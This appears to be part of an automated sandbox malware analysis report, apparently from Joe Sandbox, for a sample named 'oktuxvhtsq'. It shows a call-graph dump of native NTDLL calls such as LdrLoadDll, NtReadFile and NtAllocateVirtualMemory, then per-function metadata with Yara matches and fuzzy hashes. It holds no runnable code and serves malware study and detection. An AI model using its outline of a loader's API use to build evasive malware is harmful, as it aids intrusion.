82241->82305 82242 414b63 82362 41a420 LdrLoadDll 82242->82362 82245 414b6d 82245->82208 82246 414ba7 82247 41bd80 2 API calls 82246->82247 82251 414bb3 82247->82251 82248->82238 82302 419c10 82248->82302 82249 414d39 82250 41a450 2 API calls 82249->82250 82253 414d40 82250->82253 82251->82245 82251->82249 82252 414d4f 82251->82252 82256 414c42 82251->82256 82371 414780 LdrLoadDll NtReadFile NtClose 82252->82371 82253->82208 82255 414d62 82255->82208 82257 414ca9 82256->82257 82259 414c51 82256->82259 82257->82249 82258 414cbc 82257->82258 82364 41a2a0 82258->82364 82261 414c56 82259->82261 82262 414c6a 82259->82262 82363 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82261->82363 82263 414c87 82262->82263 82264 414c6f 82262->82264 82263->82253 82320 414400 82263->82320 82308 4146e0 82264->82308 82269 414c60 82269->82208 82270 414c7d 82270->82208 82272 414d1c 82368 41a450 82272->82368 82273 414c9f 82273->82208 82275 414d28 82275->82208 82278 41b0c1 82276->82278 82277 41b0d3 82277->82211 82278->82277 82389 41bd00 82278->82389 82280 41b0f4 82392 414060 82280->82392 82282 41b140 82282->82211 82283 41b117 82283->82282 82284 414060 3 API calls 82283->82284 82287 41b139 82284->82287 82286 41b1ca 82288 41b1da 82286->82288 82518 41aec0 LdrLoadDll 82286->82518 82287->82282 82424 415380 82287->82424 82434 41ad30 82288->82434 82291 41b208 82513 419e80 82291->82513 82295 41af20 LdrLoadDll 82294->82295 82296 419edc 82295->82296 82546 72fae8 LdrInitializeThunk 82296->82546 82297 419ef7 82299 41bd80 82297->82299 82547 41a630 82299->82547 82301 41b319 82301->82178 82303 41af20 LdrLoadDll 82302->82303 82304 414b34 82302->82304 82303->82304 82304->82241 82304->82242 82304->82245 82306 41af20 LdrLoadDll 82305->82306 82307 41a33c NtCreateFile 82306->82307 82307->82246 82309 4146fc 82308->82309 82310 41a2a0 LdrLoadDll 82309->82310 82311 41471d 82310->82311 82312 414724 82311->82312 82313 414738 82311->82313 82314 41a450 2 API calls 82312->82314 82315 41a450 2 API calls 82313->82315 82317 41472d 82314->82317 82316 414741 82315->82316 82372 41bf90 LdrLoadDll RtlAllocateHeap 82316->82372 82317->82270 82319 41474c 82319->82270 82321 41444b 82320->82321 82322 41447e 82320->82322 82323 41a2a0 LdrLoadDll 82321->82323 82324 4145c9 82322->82324 82328 41449a 82322->82328 82326 414466 82323->82326 82325 41a2a0 LdrLoadDll 82324->82325 82334 4145e4 82325->82334 82327 41a450 2 API calls 82326->82327 82329 41446f 82327->82329 82330 41a2a0 LdrLoadDll 82328->82330 82329->82273 82331 4144b5 82330->82331 82332 4144d1 82331->82332 82333 4144bc 82331->82333 82338 4144d6 82332->82338 82339 4144ec 82332->82339 82337 41a450 2 API calls 82333->82337 82385 41a2e0 LdrLoadDll 82334->82385 82336 41461e 82340 41a450 2 API calls 82336->82340 82341 4144c5 82337->82341 82342 41a450 2 API calls 82338->82342 82348 4144f1 82339->82348 82373 41bf50 82339->82373 82343 414629 82340->82343 82341->82273 82344 4144df 82342->82344 82343->82273 82344->82273 82347 414557 82349 41456e 82347->82349 82384 41a260 LdrLoadDll 82347->82384 82355 414503 82348->82355 82376 41a3d0 82348->82376 82351 414575 82349->82351 82352 41458a 82349->82352 82353 41a450 2 API calls 82351->82353 82354 41a450 2 API calls 82352->82354 82353->82355 82356 414593 82354->82356 82355->82273 82357 4145bf 82356->82357 82379 41bb50 82356->82379 82357->82273 82359 4145aa 82360 41bd80 2 API calls 82359->82360 82361 4145b3 82360->82361 82361->82273 82362->82245 82363->82269 82365 414d04 82364->82365 82366 41af20 LdrLoadDll 82364->82366 82367 41a2e0 LdrLoadDll 82365->82367 82366->82365 82367->82272 82369 41a46c NtClose 82368->82369 82370 41af20 LdrLoadDll 82368->82370 82369->82275 82370->82369 82371->82255 82372->82319 82375 41bf68 82373->82375 82386 41a5f0 82373->82386 82375->82348 82377 41a3ec NtReadFile 82376->82377 82378 41af20 LdrLoadDll 82376->82378 82377->82347 82378->82377 82380 41bb74 82379->82380 82381 41bb5d 82379->82381 82380->82359 82381->82380 82382 41bf50 2 API calls 82381->82382 82383 41bb8b 82382->82383 82383->82359 82384->82349 82385->82336 82387 41af20 LdrLoadDll 82386->82387 82388 41a60c RtlAllocateHeap 82387->82388 82388->82375 82390 41bd2d 82389->82390 82519 41a500 82389->82519 82390->82280 82393 414071 82392->82393 82394 414079 82392->82394 82393->82283 82423 41434c 82394->82423 82522 41cef0 82394->82522 82396 4140cd 82397 41cef0 2 API calls 82396->82397 82401 4140d8 82397->82401 82398 414126 82400 41cef0 2 API calls 82398->82400 82404 41413a 82400->82404 82401->82398 82402 41d020 3 API calls 82401->82402 82533 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 82401->82533 82402->82401 82403 414197 82405 41cef0 2 API calls 82403->82405 82404->82403 82527 41d020 82404->82527 82406 4141ad 82405->82406 82408 4141ea 82406->82408 82410 41d020 3 API calls 82406->82410 82409 41cef0 2 API calls 82408->82409 82411 4141f5 82409->82411 82410->82406 82412 41d020 3 API calls 82411->82412 82414 41422f 82411->82414 82412->82411 82534 41cf50 LdrLoadDll RtlFreeHeap 82414->82534 82415 414324 82535 41cf50 LdrLoadDll RtlFreeHeap 82415->82535 82417 41432e 82536 41cf50 LdrLoadDll RtlFreeHeap 82417->82536 82419 414338 82537 41cf50 LdrLoadDll RtlFreeHeap 82419->82537 82421 414342 82538 41cf50 LdrLoadDll RtlFreeHeap 82421->82538 82423->82283 82425 415391 82424->82425 82426 414a40 8 API calls 82425->82426 82428 4153a7 82426->82428 82427 4153fa 82427->82286 82428->82427 82429 4153e2 82428->82429 82430 4153f5 82428->82430 82432 41bd80 2 API calls 82429->82432 82431 41bd80 2 API calls 82430->82431 82431->82427 82433 4153e7 82432->82433 82433->82286 82539 41abf0 82434->82539 82437 41abf0 LdrLoadDll 82438 41ad4d 82437->82438 82439 41abf0 LdrLoadDll 82438->82439 82440 41ad56 82439->82440 82441 41abf0 LdrLoadDll 82440->82441 82442 41ad5f 82441->82442 82443 41abf0 LdrLoadDll 82442->82443 82444 41ad68 82443->82444 82445 41abf0 LdrLoadDll 82444->82445 82446 41ad71 82445->82446 82447 41abf0 LdrLoadDll 82446->82447 82448 41ad7d 82447->82448 82449 41abf0 LdrLoadDll 82448->82449 82450 41ad86 82449->82450 82451 41abf0 LdrLoadDll 82450->82451 82452 41ad8f 82451->82452 82453 41abf0 LdrLoadDll 82452->82453 82454 41ad98 82453->82454 82455 41abf0 LdrLoadDll 82454->82455 82456 41ada1 82455->82456 82457 41abf0 LdrLoadDll 82456->82457 82458 41adaa 82457->82458 82459 41abf0 LdrLoadDll 82458->82459 82460 41adb6 82459->82460 82461 41abf0 LdrLoadDll 82460->82461 82462 41adbf 82461->82462 82463 41abf0 LdrLoadDll 82462->82463 82464 41adc8 82463->82464 82465 41abf0 LdrLoadDll 82464->82465 82466 41add1 82465->82466 82467 41abf0 LdrLoadDll 82466->82467 82468 41adda 82467->82468 82469 41abf0 LdrLoadDll 82468->82469 82470 41ade3 82469->82470 82471 41abf0 LdrLoadDll 82470->82471 82472 41adef 82471->82472 82473 41abf0 LdrLoadDll 82472->82473 82474 41adf8 82473->82474 82475 41abf0 LdrLoadDll 82474->82475 82476 41ae01 82475->82476 82477 41abf0 LdrLoadDll 82476->82477 82478 41ae0a 82477->82478 82479 41abf0 LdrLoadDll 82478->82479 82480 41ae13 82479->82480 82481 41abf0 LdrLoadDll 82480->82481 82482 41ae1c 82481->82482 82483 41abf0 LdrLoadDll 82482->82483 82484 41ae28 82483->82484 82485 41abf0 LdrLoadDll 82484->82485 82486 41ae31 82485->82486 82487 41abf0 LdrLoadDll 82486->82487 82488 41ae3a 82487->82488 82489 41abf0 LdrLoadDll 82488->82489 82490 41ae43 82489->82490 82491 41abf0 LdrLoadDll 82490->82491 82492 41ae4c 82491->82492 82493 41abf0 LdrLoadDll 82492->82493 82494 41ae55 82493->82494 82495 41abf0 LdrLoadDll 82494->82495 82496 41ae61 82495->82496 82497 41abf0 LdrLoadDll 82496->82497 82498 41ae6a 82497->82498 82499 41abf0 LdrLoadDll 82498->82499 82500 41ae73 82499->82500 82501 41abf0 LdrLoadDll 82500->82501 82502 41ae7c 82501->82502 82503 41abf0 LdrLoadDll 82502->82503 82504 41ae85 82503->82504 82505 41abf0 LdrLoadDll 82504->82505 82506 41ae8e 82505->82506 82507 41abf0 LdrLoadDll 82506->82507 82508 41ae9a 82507->82508 82509 41abf0 LdrLoadDll 82508->82509 82510 41aea3 82509->82510 82511 41abf0 LdrLoadDll 82510->82511 82512 41aeac 82511->82512 82512->82291 82514 41af20 LdrLoadDll 82513->82514 82515 419e9c 82514->82515 82545 72fdc0 LdrInitializeThunk 82515->82545 82516 419eb3 82516->82211 82518->82288 82520 41af20 LdrLoadDll 82519->82520 82521 41a51c NtAllocateVirtualMemory 82520->82521 82521->82390 82523 41cf00 82522->82523 82524 41cf06 82522->82524 82523->82396 82525 41bf50 2 API calls 82524->82525 82526 41cf2c 82525->82526 82526->82396 82528 41cf90 82527->82528 82529 41cfed 82528->82529 82530 41bf50 2 API calls 82528->82530 82529->82404 82531 41cfca 82530->82531 82532 41bd80 2 API calls 82531->82532 82532->82529 82533->82401 82534->82415 82535->82417 82536->82419 82537->82421 82538->82423 82540 41ac0b 82539->82540 82541 414e40 LdrLoadDll 82540->82541 82542 41ac2b 82541->82542 82543 414e40 LdrLoadDll 82542->82543 82544 41acd7 82542->82544 82543->82544 82544->82437 82545->82516 82546->82297 82548 41a64c RtlFreeHeap 82547->82548 82549 41af20 LdrLoadDll 82547->82549 82548->82301 82549->82548 82551 407eb0 82550->82551 82552 407eab 82550->82552 82553 41bd00 2 API calls 82551->82553 82552->82219 82559 407ed5 82553->82559 82554 407f38 82554->82219 82555 419e80 2 API calls 82555->82559 82556 407f3e 82558 407f64 82556->82558 82560 41a580 2 API calls 82556->82560 82558->82219 82559->82554 82559->82555 82559->82556 82561 41bd00 2 API calls 82559->82561 82566 41a580 82559->82566 82562 407f55 82560->82562 82561->82559 82562->82219 82564 40817e 82563->82564 82565 41a580 2 API calls 82563->82565 82564->82180 82565->82564 82567 41af20 LdrLoadDll 82566->82567 82568 41a59c 82567->82568 82571 72fb68 LdrInitializeThunk 82568->82571 82569 41a5b3 82569->82559 82571->82569 82573 41b583 82572->82573 82576 40ace0 82573->82576 82577 40ad04 82576->82577 82578 40ad40 LdrLoadDll 82577->82578 82579 409c4b 82577->82579 82578->82579 82579->82188 82582 40b053 82580->82582 82581 40b0d0 82581->82193 82582->82581 82595 419c50 LdrLoadDll 82582->82595 82585 41af20 LdrLoadDll 82584->82585 82586 40f1ab 82585->82586 82586->82196 82587 41a790 82586->82587 82588 41a7af LookupPrivilegeValueW 82587->82588 82589 41af20 LdrLoadDll 82587->82589 82588->82198 82589->82588 82591 41af20 LdrLoadDll 82590->82591 82592 41a23c 82591->82592 82596 72fed0 LdrInitializeThunk 82592->82596 82593 41a25b 82593->82199 82595->82581 82596->82593 82598 40b1e0 82597->82598 82599 40b030 LdrLoadDll 82598->82599 82600 40b1f4 82599->82600 82600->82135 82602 40ae41 82601->82602 82603 40ae3d 82601->82603 82604 40ae5a 82602->82604 82605 40ae8c 82602->82605 82603->82137 82647 419c90 LdrLoadDll 82604->82647 82648 419c90 LdrLoadDll 82605->82648 82607 40ae9d 82607->82137 82609 40ae7c 82609->82137 82611 40f490 3 API calls 82610->82611 82612 4143b6 82610->82612 82611->82612 82612->82139 82614 408a79 82613->82614 82649 4087a0 82613->82649 82616 4087a0 19 API calls 82614->82616 82619 408a9d 82614->82619 82617 408a8a 82616->82617 82617->82619 82667 40f700 10 API calls 82617->82667 82619->82141 82621 41af20 LdrLoadDll 82620->82621 82622 41a4dc 82621->82622 82786 72fea0 LdrInitializeThunk 82622->82786 82623 40c312 82625 40f490 82623->82625 82626 40f4ad 82625->82626 82787 419f80 82626->82787 82629 40f4f5 82629->82145 82630 419fd0 2 API calls 82631 40f51e 82630->82631 82631->82145 82633 41af20 LdrLoadDll 82632->82633 82634 419fec 82633->82634 82793 72fc60 LdrInitializeThunk 82634->82793 82635 40c375 82635->82151 82635->82154 82638 41af20 LdrLoadDll 82637->82638 82639 41a03c 82638->82639 82794 72fc90 LdrInitializeThunk 82639->82794 82640 40c449 82640->82162 82643 41af20 LdrLoadDll 82642->82643 82644 419dfc 82643->82644 82795 730078 LdrInitializeThunk 82644->82795 82645 40c49c 82645->82166 82647->82609 82648->82607 82650 407ea0 4 API calls 82649->82650 82652 4087ba 82649->82652 82650->82652 82651 408a49 82651->82614 82652->82651 82653 408a3f 82652->82653 82657 419ec0 2 API calls 82652->82657 82659 41a450 LdrLoadDll NtClose 82652->82659 82662 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 82652->82662 82665 419de0 2 API calls 82652->82665 82668 419cd0 82652->82668 82671 4085d0 82652->82671 82683 40f5e0 LdrLoadDll NtClose 82652->82683 82684 419d50 LdrLoadDll 82652->82684 82685 419d80 LdrLoadDll 82652->82685 82686 419e10 LdrLoadDll 82652->82686 82687 4083a0 82652->82687 82703 405f60 LdrLoadDll 82652->82703 82654 408160 2 API calls 82653->82654 82654->82651 82657->82652 82659->82652 82662->82652 82665->82652 82667->82619 82669 419cec 82668->82669 82670 41af20 LdrLoadDll 82668->82670 82669->82652 82670->82669 82672 4085e6 82671->82672 82704 419840 82672->82704 82674 4085ff 82679 408771 82674->82679 82725 4081a0 82674->82725 82676 4086e5 82677 4083a0 11 API calls 82676->82677 82676->82679 82678 408713 82677->82678 82678->82679 82680 419ec0 2 API calls 82678->82680 82679->82652 82681 408748 82680->82681 82681->82679 82682 41a4c0 2 API calls 82681->82682 82682->82679 82683->82652 82684->82652 82685->82652 82686->82652 82688 4083c9 82687->82688 82765 408310 82688->82765 82691 41a4c0 2 API calls 82692 4083dc 82691->82692 82692->82691 82693 408467 82692->82693 82695 408462 82692->82695 82773 40f660 82692->82773 82693->82652 82694 41a450 2 API calls 82696 40849a 82694->82696 82695->82694 82696->82693 82697 419cd0 LdrLoadDll 82696->82697 82698 4084ff 82697->82698 82698->82693 82777 419d10 82698->82777 82700 408563 82700->82693 82701 414a40 8 API calls 82700->82701 82702 4085b8 82701->82702 82702->82652 82703->82652 82705 41bf50 2 API calls 82704->82705 82706 419857 82705->82706 82732 409310 82706->82732 82708 419872 82709 4198b0 82708->82709 82710 419899 82708->82710 82713 41bd00 2 API calls 82709->82713 82711 41bd80 2 API calls 82710->82711 82712 4198a6 82711->82712 82712->82674 82714 4198ea 82713->82714 82715 41bd00 2 API calls 82714->82715 82716 419903 82715->82716 82722 419ba4 82716->82722 82738 41bd40 82716->82738 82719 419b90 82720 41bd80 2 API calls 82719->82720 82721 419b9a 82720->82721 82721->82674 82723 41bd80 2 API calls 82722->82723 82724 419bf9 82723->82724 82724->82674 82726 40829f 82725->82726 82727 4081b5 82725->82727 82726->82676 82727->82726 82728 414a40 8 API calls 82727->82728 82729 408222 82728->82729 82730 41bd80 2 API calls 82729->82730 82731 408249 82729->82731 82730->82731 82731->82676 82733 409335 82732->82733 82734 40ace0 LdrLoadDll 82733->82734 82735 409368 82734->82735 82737 40938d 82735->82737 82741 40cf10 82735->82741 82737->82708 82759 41a540 82738->82759 82742 40cf3c 82741->82742 82743 41a1a0 LdrLoadDll 82742->82743 82744 40cf55 82743->82744 82745 40cf5c 82744->82745 82752 41a1e0 82744->82752 82745->82737 82749 40cf97 82750 41a450 2 API calls 82749->82750 82751 40cfba 82750->82751 82751->82737 82753 41af20 LdrLoadDll 82752->82753 82754 41a1fc 82753->82754 82758 72fbb8 LdrInitializeThunk 82754->82758 82755 40cf7f 82755->82745 82757 41a7d0 LdrLoadDll 82755->82757 82757->82749 82758->82755 82760 41af20 LdrLoadDll 82759->82760 82761 41a55c 82760->82761 82764 730048 LdrInitializeThunk 82761->82764 82762 419b89 82762->82719 82762->82722 82764->82762 82766 408328 82765->82766 82767 40ace0 LdrLoadDll 82766->82767 82768 408343 82767->82768 82769 414e40 LdrLoadDll 82768->82769 82770 408353 82769->82770 82771 40835c PostThreadMessageW 82770->82771 82772 408370 82770->82772 82771->82772 82772->82692 82774 40f673 82773->82774 82780 419e50 82774->82780 82778 41af20 LdrLoadDll 82777->82778 82779 419d2c 82778->82779 82779->82700 82781 41af20 LdrLoadDll 82780->82781 82782 419e6c 82781->82782 82785 72fd8c LdrInitializeThunk 82782->82785 82783 40f69e 82783->82692 82785->82783 82786->82623 82788 419f9c 82787->82788 82789 41af20 LdrLoadDll 82787->82789 82792 72ffb4 LdrInitializeThunk 82788->82792 82789->82788 82790 40f4ee 82790->82629 82790->82630 82792->82790 82793->82635 82794->82640 82795->82645 82796 72f900 LdrInitializeThunk

                                  Executed Functions

                                  Function 0041A3CA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: 33dcf55a6d7cffd85285e2efbc1188158a9fa2e30f4957344ab0f5a6bd6b24e2
                                  • Instruction ID: 7af921839762fc8d234943a10333014a8d3361fab9fd09aed87850b0a117b89a
                                  • Opcode Fuzzy Hash: 33dcf55a6d7cffd85285e2efbc1188158a9fa2e30f4957344ab0f5a6bd6b24e2
                                  • Instruction Fuzzy Hash: 82014CB2200214AFCB14DF99DC85EEB77ADEF8C718F058659BA1D97241C630E911CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 41a3d0-41a3e6 9 41a3ec-41a419 NtReadFile 8->9 10 41a3e7 call 41af20 8->10 10->9
                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 239 40ace0-40acfc 240 40ad04-40ad09 239->240 241 40acff call 41cc10 239->241 242 40ad0b-40ad0e 240->242 243 40ad0f-40ad1d call 41d030 240->243 241->240 246 40ad2d-40ad30 243->246 247 40ad1f-40ad2a call 41d2b0 243->247 249 40ad36-40ad3e 246->249 250 40ad31 call 41b460 246->250 247->246 252 40ad40-40ad54 LdrLoadDll 249->252 253 40ad57-40ad5a 249->253 250->249 252->253
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 254 41a320-41a371 call 41af20 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 273 41a500-41a53d call 41af20 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A44B Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 568dc3e59f7221dbbbdb43f9baaca06f5701ba7f862418ba9aa500066b6c7a49
                                  • Instruction ID: bcccc9545e37b7909c3383d76274991b344d2402d374e448eeb040248771b24d
                                  • Opcode Fuzzy Hash: 568dc3e59f7221dbbbdb43f9baaca06f5701ba7f862418ba9aa500066b6c7a49
                                  • Instruction Fuzzy Hash: 60D02BAE0092C04FCB10EAB474C10C27F40DD5032C3251D8FE4A40B703C138D616A3A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00730078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00730048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

